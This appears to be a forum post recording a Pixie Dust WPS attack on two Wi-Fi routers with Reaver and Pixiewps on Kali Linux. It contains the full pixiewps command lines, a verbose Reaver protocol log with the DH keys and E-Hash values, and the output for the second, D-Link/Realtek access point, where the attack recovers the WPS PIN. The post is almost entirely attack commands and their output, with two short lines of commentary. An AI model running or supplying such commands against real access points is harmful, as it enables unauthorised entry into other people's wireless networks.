executing pixiewps -e d0141b15656e96b85fcead2e8e76330d2b1ac1576bb026e7a328c0e1baf8cf91664371174c08ee12ec92b0519c54879f21255be5a8770e1fa1880470ef423c90e34d7847a6fcb4924563d1af1db0c481ead9852c519bf1dd429c163951cf69181b132aea2a3684caf35bc54aca1b20c88bb3b7339ff7d56e09139d77f0ac58079097938251dbbe75e86715cc6b7c0ca945fa8dd8d661beb73b414032798dadee32b5dd61bf105f18d89217760b75c5d966a5a490472ceba9e3b4224f3d89fb2b -s 7a7c071e898e1cf6706c63195aa843fbe9c3db0d6d29d970d11be470120be611 -z db6295833be0cebcbadbc2e01bcfaae31f683cc2773f4c201f8fae2b730b5252 -a 242cc4395c80522edbdc287a4d280f7ed3b3c4ca98e526b75e20e06cc90139e3 -n ce1219309ec2dc9bd33a70eef846395b -r 6168318eb6a1b18be78880b14a343453131fb1c23911572983c5984851e4f73edd27db68515177df0e3ba492371b89be8596061fe7997a4452264d45aa91ec8bb8feb8810f345cd4b1c9846383c68432e48a83072572973e2b8da5e1d07cc8280e94174da9cc98a8252220985a11e17c22136bfd30be691667f4e3186b52ab58ec466a5d7a966346b74262c45c571757017966ba553d298ac486660ef3bcd42673cacb80c825ee52809f9a9a547586985d13c3e8d847fd992d828d4fc6bae82a
Pixiewps 1.4
[-] WPS pin not found!
[*] Time taken: 0 s 57 ms
__________________________________________________ __________________________-
Code:
root@kali:~# pixiewps -e d0141b15656e96b85fcead2e8e76330d2b1ac1576bb026e7a328c0e1baf8cf91664371174c08ee12ec92b0519c54879f21255be5a8770e1fa1880470ef423c90e34d7847a6fcb4924563d1af1db0c481ead9852c519bf1dd429c163951cf69181b132aea2a3684caf35bc54aca1b20c88bb3b7339ff7d56e09139d77f0ac58079097938251dbbe75e86715cc6b7c0ca945fa8dd8d661beb73b414032798dadee32b5dd61bf105f18d89217760b75c5d966a5a490472ceba9e3b4224f3d89fb2b -s 7a7c071e898e1cf6706c63195aa843fbe9c3db0d6d29d970d11be470120be611 -z db6295833be0cebcbadbc2e01bcfaae31f683cc2773f4c201f8fae2b730b5252 -a 242cc4395c80522edbdc287a4d280f7ed3b3c4ca98e526b75e20e06cc90139e3 -n ce1219309ec2dc9bd33a70eef846395b -r 6168318eb6a1b18be78880b14a343453131fb1c23911572983c5984851e4f73edd27db68515177df0e3ba492371b89be8596061fe7997a4452264d45aa91ec8bb8feb8810f345cd4b1c9846383c68432e48a83072572973e2b8da5e1d07cc8280e94174da9cc98a8252220985a11e17c22136bfd30be691667f4e3186b52ab58ec466a5d7a966346b74262c45c571757017966ba553d298ac486660ef3bcd42673cacb80c825ee52809f9a9a547586985d13c3e8d847fd992d828d4fc6bae82a -f
Pixiewps 1.4
[-] WPS pin not found!
[*] Time taken: 0 s 52 ms
NOW i tried with another router
WASH Data :
Code:
"bssid" : "54:B8:0A:15:EA:E0", "essid" : "D-Link 11n AP 2.4G", "channel" : 3, "rssi" : -70, "vendor_oui" : "00E04C", "wps_version" : 32, "wps_state" : 2, "wps_locked" : 2, "wps_manufacturer" : "D-Link Corp.", "wps_model_name" : "RTL8xxx", "wps_model_number" : "EV-2010-09-20", "wps_device_name" : "RTL8196d", "wps_serial" : "123456789012347", "wps_uuid" : "112233445566778899aa54b80a15eae0", "wps_response_type" : "03", "wps_primary_device_type" : "00060050f2040001", "wps_config_methods" : "2008", "wps_rf_bands" : "03", "dummy": 0}
Reaver v1.6.5 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
[+] Switching wlan0mon to channel 3
[?] Restore previous session for 54:B8:0A:15:EA:E0? [n/Y] n
[+] Waiting for beacon from 54:B8:0A:15:EA:E0
[+] Received beacon from 54:B8:0A:15:EA:E0
[+] Vendor: RealtekS
WPS: A new PIN configured (timeout=0)
WPS: UUID - hexdump(len=16): [NULL]
WPS: PIN - hexdump_ascii(len=8):
31 32 33 34 35 36 37 30 12345670
WPS: Selected registrar information changed
WPS: Internal Registrar selected (pbc=0)
WPS: sel_reg_union
WPS: set_ie
WPS: cb_set_sel_reg
WPS: Enter wps_cg_set_sel_reg
WPS: Leave wps_cg_set_sel_reg early
WPS: return from wps_selected_registrar_changed
[+] Trying pin "12345670"
send_packet called from deauthenticate() 80211.c:333
send_packet called from authenticate() 80211.c:364
[+] Sending authentication request
[!] Found packet with bad FCS, skipping...
send_packet called from associate() 80211.c:417
[+] Sending association request
send_packet called from resend_last_packet() send.c:161
[+] Associated with 54:B8:0A:15:EA:E0 (ESSID: D-Link 11n AP 2.4G)
[+] Sending EAPOL START request
send_packet called from send_eapol_start() send.c:48
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
send_packet called from resend_last_packet() send.c:161
WPS: Processing received message (len=412 op_code=4)
WPS: Received WSC_MSG
WPS: Unsupported attribute type 0x1049 len=6
WPS: Parsed WSC_MSG
WPS: Received M1
WPS: UUID-E - hexdump(len=16): 11 22 33 44 55 66 77 88 99 aa 54 b8 0a 15 ea e0
WPS: Enrollee MAC Address 54:b8:0a:15:ea:e0
WPS: Enrollee Nonce - hexdump(len=16): 3d 0c 07 f9 18 2a 7e e7 71 fe 90 63 7b 31 b3 2a
WPS: Enrollee Authentication Type flags 0x21
WPS: No match in supported authentication types (own 0x0 Enrollee 0x21)
WPS: Workaround - assume Enrollee does not advertise supported authentication types correctly
WPS: Enrollee Encryption Type flags 0x9
WPS: No match in supported encryption types (own 0x0 Enrollee 0x9)
WPS: Workaround - assume Enrollee does not advertise supported encryption types correctly
WPS: Enrollee Connection Type flags 0x1
WPS: Enrollee Config Methods 0x2688 [Display] [PBC]
WPS: Enrollee Wi-Fi Protected Setup State 2
WPS: Manufacturer - hexdump_ascii(len=12):
44 2d 4c 69 6e 6b 20 43 6f 72 70 2e D-Link Corp.
WPS: Model Name - hexdump_ascii(len=7):
52 54 4c 38 78 78 78 RTL8xxx
WPS: Model Number - hexdump_ascii(len=13):
45 56 2d 32 30 31 30 2d 30 39 2d 32 30 EV-2010-09-20
WPS: Serial Number - hexdump_ascii(len=15):
31 32 33 34 35 36 37 38 39 30 31 32 33 34 37 123456789012347
WPS: Primary Device Type: 6-0050F204-1
WPS: Device Name - hexdump_ascii(len=8):
52 54 4c 38 31 39 36 64 RTL8196d
WPS: Enrollee RF Bands 0x1
WPS: Enrollee Association State 0
WPS: Device Password ID 0
WPS: Enrollee Configuration Error 0
WPS: OS Version 10000000
WPS: M1 Processed
WPS: dev_pw_id checked
WPS: PBC Checked
WPS: Entering State SEND_M2
WPS: WPS_CONTINUE, Freeing Last Message
WPS: WPS_CONTINUE, Saving Last Message
WPS: returning
[+] Received M1 message
WPS: Found a wildcard PIN. Assigned it for this UUID-E
WPS: Registrar Nonce - hexdump(len=16): 90 39 cd 10 c2 7a 78 37 91 65 8c a1 c8 38 a4 8d
WPS: UUID-R - hexdump(len=16): f1 4e 45 8f 7c 4d d6 d4 bd 81 2c 95 22 d2 11 46
WPS: Building Message M2
WPS: * Version
WPS: * Message Type (5)
WPS: * Enrollee Nonce
WPS: * Registrar Nonce
WPS: * UUID-R
WPS: * Public Key
WPS: Generate new DH keys
DH: private value - hexdump(len=192): 74 81 06 e6 c3 c1 1d e6 81 ab c6 99 b8 47 33 2a c5 17 89 f6 f1 87 c5 b2 9d 72 bf 86 98 11 08 13 82 eb 45 b5 9a 6f 63 bb 33 a9 4d 1c 4a 23 f3 f6 3e d3 64 4e 3e 27 75 58 42 b7 97 ea 58 ab 26 2a 97 80 72 94 db 6e d3 5e 90 bd af 5b 56 5a 2d c7 dc 2a 51 2d 3b c7 3d 29 c5 7e 03 49 c5 ea 0d ae 7c f2 30 fc 30 34 6c 49 b8 8a d6 95 3d 4f 36 13 19 54 2a 38 c3 38 55 1a c0 96 f2 3c 8b 28 77 de a6 7b e4 f5 ee 4e 79 87 ba a1 30 37 c9 8a 99 ef 89 13 6f 9a f2 dc 68 5d ce a3 56 d0 ed 67 83 70 08 77 ab 7e 79 dd c8 3a 36 2d a9 dd 3b 85 2b da 9c fc 67 54 e3 2f 85 d4 9a c5 e5 0f 9c 56 69 8d
DH: public value - hexdump(len=192): bf 5c b5 1a 82 d1 f8 6e 10 b6 7b b1 98 3b 86 98 28 e5 ed 0b 6c 94 32 55 0c 35 29 1e ee ea 0d 73 cc 8f f4 7c 15 7b b2 5a 42 ba 4f 39 3c 66 38 95 cc 7e eb ae 48 7a 91 45 56 ef 0f 18 10 54 01 3f bb c3 b1 8d b6 d9 03 48 2b c2 57 ad b1 f2 7d 41 7e 71 d3 a3 7e 93 6d b6 8e e8 59 7c 98 54 b3 c8 55 f0 03 2b 96 f1 1c 92 fa 75 17 95 9f 54 43 1a da b1 15 31 2a 3f 4f 2b 01 2b 12 ce c8 0f f6 c6 53 ba 27 17 94 83 fc 29 06 e0 5c 9f 54 c9 0a 8e ad f9 28 39 10 20 17 a5 b4 44 be 7f 54 f2 2d b0 94 f9 e0 8f 73 54 cf fe b6 e8 a8 b5 eb 68 93 35 20 c5 96 82 65 a2 13 5c ed 88 c5 f7 9f 4b 42 2d
WPS: DH Private Key - hexdump(len=192): 74 81 06 e6 c3 c1 1d e6 81 ab c6 99 b8 47 33 2a c5 17 89 f6 f1 87 c5 b2 9d 72 bf 86 98 11 08 13 82 eb 45 b5 9a 6f 63 bb 33 a9 4d 1c 4a 23 f3 f6 3e d3 64 4e 3e 27 75 58 42 b7 97 ea 58 ab 26 2a 97 80 72 94 db 6e d3 5e 90 bd af 5b 56 5a 2d c7 dc 2a 51 2d 3b c7 3d 29 c5 7e 03 49 c5 ea 0d ae 7c f2 30 fc 30 34 6c 49 b8 8a d6 95 3d 4f 36 13 19 54 2a 38 c3 38 55 1a c0 96 f2 3c 8b 28 77 de a6 7b e4 f5 ee 4e 79 87 ba a1 30 37 c9 8a 99 ef 89 13 6f 9a f2 dc 68 5d ce a3 56 d0 ed 67 83 70 08 77 ab 7e 79 dd c8 3a 36 2d a9 dd 3b 85 2b da 9c fc 67 54 e3 2f 85 d4 9a c5 e5 0f 9c 56 69 8d
WPS: DH own Public Key - hexdump(len=192): bf 5c b5 1a 82 d1 f8 6e 10 b6 7b b1 98 3b 86 98 28 e5 ed 0b 6c 94 32 55 0c 35 29 1e ee ea 0d 73 cc 8f f4 7c 15 7b b2 5a 42 ba 4f 39 3c 66 38 95 cc 7e eb ae 48 7a 91 45 56 ef 0f 18 10 54 01 3f bb c3 b1 8d b6 d9 03 48 2b c2 57 ad b1 f2 7d 41 7e 71 d3 a3 7e 93 6d b6 8e e8 59 7c 98 54 b3 c8 55 f0 03 2b 96 f1 1c 92 fa 75 17 95 9f 54 43 1a da b1 15 31 2a 3f 4f 2b 01 2b 12 ce c8 0f f6 c6 53 ba 27 17 94 83 fc 29 06 e0 5c 9f 54 c9 0a 8e ad f9 28 39 10 20 17 a5 b4 44 be 7f 54 f2 2d b0 94 f9 e0 8f 73 54 cf fe b6 e8 a8 b5 eb 68 93 35 20 c5 96 82 65 a2 13 5c ed 88 c5 f7 9f 4b 42 2d
WPS: DH Private Key - hexdump(len=192): 74 81 06 e6 c3 c1 1d e6 81 ab c6 99 b8 47 33 2a c5 17 89 f6 f1 87 c5 b2 9d 72 bf 86 98 11 08 13 82 eb 45 b5 9a 6f 63 bb 33 a9 4d 1c 4a 23 f3 f6 3e d3 64 4e 3e 27 75 58 42 b7 97 ea 58 ab 26 2a 97 80 72 94 db 6e d3 5e 90 bd af 5b 56 5a 2d c7 dc 2a 51 2d 3b c7 3d 29 c5 7e 03 49 c5 ea 0d ae 7c f2 30 fc 30 34 6c 49 b8 8a d6 95 3d 4f 36 13 19 54 2a 38 c3 38 55 1a c0 96 f2 3c 8b 28 77 de a6 7b e4 f5 ee 4e 79 87 ba a1 30 37 c9 8a 99 ef 89 13 6f 9a f2 dc 68 5d ce a3 56 d0 ed 67 83 70 08 77 ab 7e 79 dd c8 3a 36 2d a9 dd 3b 85 2b da 9c fc 67 54 e3 2f 85 d4 9a c5 e5 0f 9c 56 69 8d
WPS: DH peer Public Key - hexdump(len=192): d0 14 1b 15 65 6e 96 b8 5f ce ad 2e 8e 76 33 0d 2b 1a c1 57 6b b0 26 e7 a3 28 c0 e1 ba f8 cf 91 66 43 71 17 4c 08 ee 12 ec 92 b0 51 9c 54 87 9f 21 25 5b e5 a8 77 0e 1f a1 88 04 70 ef 42 3c 90 e3 4d 78 47 a6 fc b4 92 45 63 d1 af 1d b0 c4 81 ea d9 85 2c 51 9b f1 dd 42 9c 16 39 51 cf 69 18 1b 13 2a ea 2a 36 84 ca f3 5b c5 4a ca 1b 20 c8 8b b3 b7 33 9f f7 d5 6e 09 13 9d 77 f0 ac 58 07 90 97 93 82 51 db be 75 e8 67 15 cc 6b 7c 0c a9 45 fa 8d d8 d6 61 be b7 3b 41 40 32 79 8d ad ee 32 b5 dd 61 bf 10 5f 18 d8 92 17 76 0b 75 c5 d9 66 a5 a4 90 47 2c eb a9 e3 b4 22 4f 3d 89 fb 2b
DH: shared key - hexdump(len=192): 81 72 43 ce 61 5e 06 3e a3 2c 69 ea a7 13 db f4 58 6e 46 b1 9a 16 99 7c 0e f6 e8 f4 75 84 82 c8 2e 24 37 30 82 9e bd 3d b8 66 dc c9 6d 27 b8 27 0d e8 b3 32 1d 8b 78 07 e4 61 f1 33 e5 cf 1a fb 3c 82 ec 8a ed 2c 99 a4 03 fa 5d 2a b6 7d 5d 98 bf ed a4 21 8c 0b 93 5e 37 da 47 0a 74 98 7b e6 e2 c8 1a b0 07 9d 98 11 ae e4 cb 95 3f ed 0e 28 d5 6d 83 50 f3 f1 f9 43 e8 29 f8 2d 9e b4 7d 9a f1 60 f9 aa 3f bf 06 e1 89 e9 31 6c 31 4d 60 d7 74 12 58 c7 4e 07 bc 2e 4a b4 07 3f 09 f2 9b 64 55 9e 09 6b 3a c5 f6 d8 12 ed a4 18 70 a5 76 73 58 2c 22 c1 ea 67 57 b0 c1 20 a9 97 3c 69 20 4e
WPS: DH shared key - hexdump(len=192): 81 72 43 ce 61 5e 06 3e a3 2c 69 ea a7 13 db f4 58 6e 46 b1 9a 16 99 7c 0e f6 e8 f4 75 84 82 c8 2e 24 37 30 82 9e bd 3d b8 66 dc c9 6d 27 b8 27 0d e8 b3 32 1d 8b 78 07 e4 61 f1 33 e5 cf 1a fb 3c 82 ec 8a ed 2c 99 a4 03 fa 5d 2a b6 7d 5d 98 bf ed a4 21 8c 0b 93 5e 37 da 47 0a 74 98 7b e6 e2 c8 1a b0 07 9d 98 11 ae e4 cb 95 3f ed 0e 28 d5 6d 83 50 f3 f1 f9 43 e8 29 f8 2d 9e b4 7d 9a f1 60 f9 aa 3f bf 06 e1 89 e9 31 6c 31 4d 60 d7 74 12 58 c7 4e 07 bc 2e 4a b4 07 3f 09 f2 9b 64 55 9e 09 6b 3a c5 f6 d8 12 ed a4 18 70 a5 76 73 58 2c 22 c1 ea 67 57 b0 c1 20 a9 97 3c 69 20 4e
WPS: DHKey - hexdump(len=32): 66 3c 56 aa 7c fd d4 81 ac 93 ca 88 1e bd d4 e1 d6 b5 f3 13 a3 bf 9f 42 83 a7 06 cb 71 37 8f d6
WPS: KDK - hexdump(len=32): ce 79 eb ec 0b 03 80 c8 d1 46 5f df d0 57 fa 7f 48 8c 1e d0 f2 34 77 14 49 4b cc 73 6a 76 29 c5
WPS: AuthKey - hexdump(len=32): 25 90 fe aa 96 29 bc 51 c1 7d e8 c1 14 a2 d8 f9 6b 31 6f 28 66 84 c6 b4 7b ee 6e d5 55 65 cf d7
WPS: KeyWrapKey - hexdump(len=16): b6 57 5b 46 94 f7 56 9f ea 4f 6c 68 2d 70 6f 77
WPS: EMSK - hexdump(len=32): a4 ae 91 e2 70 55 50 cb 48 25 21 62 96 aa 15 0d 95 ab 1a 0c 42 47 5e dc d6 18 30 b5 32 21 eb 4b
WPS: * Authentication Type Flags
WPS: * Encryption Type Flags
WPS: * Connection Type Flags
WPS: * Config Methods (8c)
WPS: * Manufacturer
WPS: * Model Name
WPS: * Model Number
WPS: * Serial Number
WPS: * Primary Device Type
WPS: * Device Name
WPS: * RF Bands (0)
WPS: * Association State
WPS: * Configuration Error (0)
WPS: * Device Password ID (0)
WPS: * OS Version
WPS: * Authenticator
[+] Sending M2 message
send_packet called from send_msg() send.c:116
send_packet called from resend_last_packet() send.c:161
WPS: Processing received message (len=124 op_code=4)
WPS: Received WSC_MSG
WPS: Unsupported attribute type 0x1049 len=6
WPS: Parsed WSC_MSG
WPS: Received M3
WPS: E-Hash1 - hexdump(len=32): 0c c6 32 d2 09 fc c3 00 61 b5 4e 6c ad b9 5e bc 20 f3 68 4a 71 43 71 7f 66 72 a0 fd 56 d1 5d 0b
WPS: E-Hash2 - hexdump(len=32): ec 58 b7 05 42 9d aa 80 cf 98 df f8 b6 70 a5 af e9 55 c1 39 69 a1 d4 32 83 9e d1 a4 1c f0 df d1
executing pixiewps -e d0141b15656e96b85fcead2e8e76330d2b1ac1576bb026e7a328c0e1baf8cf91664371174c08ee12ec92b0519c54879f21255be5a8770e1fa1880470ef423c90e34d7847a6fcb4924563d1af1db0c481ead9852c519bf1dd429c163951cf69181b132aea2a3684caf35bc54aca1b20c88bb3b7339ff7d56e09139d77f0ac58079097938251dbbe75e86715cc6b7c0ca945fa8dd8d661beb73b414032798dadee32b5dd61bf105f18d89217760b75c5d966a5a490472ceba9e3b4224f3d89fb2b -s 0cc632d209fcc30061b54e6cadb95ebc20f3684a7143717f6672a0fd56d15d0b -z ec58b705429daa80cf98dff8b670a5afe955c13969a1d432839ed1a41cf0dfd1 -a 2590feaa9629bc51c17de8c114a2d8f96b316f286684c6b47bee6ed55565cfd7 -n 3d0c07f9182a7ee771fe90637b31b32a -r bf5cb51a82d1f86e10b67bb1983b869828e5ed0b6c9432550c35291eeeea0d73cc8ff47c157bb25a42ba4f393c663895cc7eebae487a914556ef0f181054013fbbc3b18db6d903482bc257adb1f27d417e71d3a37e936db68ee8597c9854b3c855f0032b96f11c92fa7517959f54431adab115312a3f4f2b012b12cec80ff6c653ba27179483fc2906e05c9f54c90a8eadf92839102017a5b444be7f54f22db094f9e08f7354cffeb6e8a8b5eb68933520c5968265a2135ced88c5f79f4b422d
Pixiewps 1.4
[-] WPS pin not found!
[*] Time taken: 0 s 61 ms
[!] The AP /might be/ vulnerable. Try again with --force or with another (newer) set of data.
Code:
root@kali:~# pixiewps -e d0141b15656e96b85fcead2e8e76330d2b1ac1576bb026e7a328c0e1baf8cf91664371174c08ee12ec92b0519c54879f21255be5a8770e1fa1880470ef423c90e34d7847a6fcb4924563d1af1db0c481ead9852c519bf1dd429c163951cf69181b132aea2a3684caf35bc54aca1b20c88bb3b7339ff7d56e09139d77f0ac58079097938251dbbe75e86715cc6b7c0ca945fa8dd8d661beb73b414032798dadee32b5dd61bf105f18d89217760b75c5d966a5a490472ceba9e3b4224f3d89fb2b -s 0cc632d209fcc30061b54e6cadb95ebc20f3684a7143717f6672a0fd56d15d0b -z ec58b705429daa80cf98dff8b670a5afe955c13969a1d432839ed1a41cf0dfd1 -a 2590feaa9629bc51c17de8c114a2d8f96b316f286684c6b47bee6ed55565cfd7 -n 3d0c07f9182a7ee771fe90637b31b32a -r bf5cb51a82d1f86e10b67bb1983b869828e5ed0b6c9432550c35291eeeea0d73cc8ff47c157bb25a42ba4f393c663895cc7eebae487a914556ef0f181054013fbbc3b18db6d903482bc257adb1f27d417e71d3a37e936db68ee8597c9854b3c855f0032b96f11c92fa7517959f54431adab115312a3f4f2b012b12cec80ff6c653ba27179483fc2906e05c9f54c90a8eadf92839102017a5b444be7f54f22db094f9e08f7354cffeb6e8a8b5eb68933520c5968265a2135ced88c5f79f4b422d -f
Pixiewps 1.4
[?] Mode: 3 (RTL819x)
[*] Seed N1: 1434604969 (Thu Jun 18 05:22:49 2015 UTC)
[*] Seed ES1: 1434604970 (Thu Jun 18 05:22:50 2015 UTC)
[*] Seed ES2: 1434604970 (Thu Jun 18 05:22:50 2015 UTC)
[*] PSK1: 8324b8e9659ec8250343001f54e42d15
[*] PSK2: 755a3d251b04c08424b30608563cdfbc
[*] ES1: 2a2d66064c4b473057da0e5123463097
[*] ES2: 2a2d66064c4b473057da0e5123463097
[+] WPS pin: 41299807
[*] Time taken: 3 s 265 ms
It did work with the second AP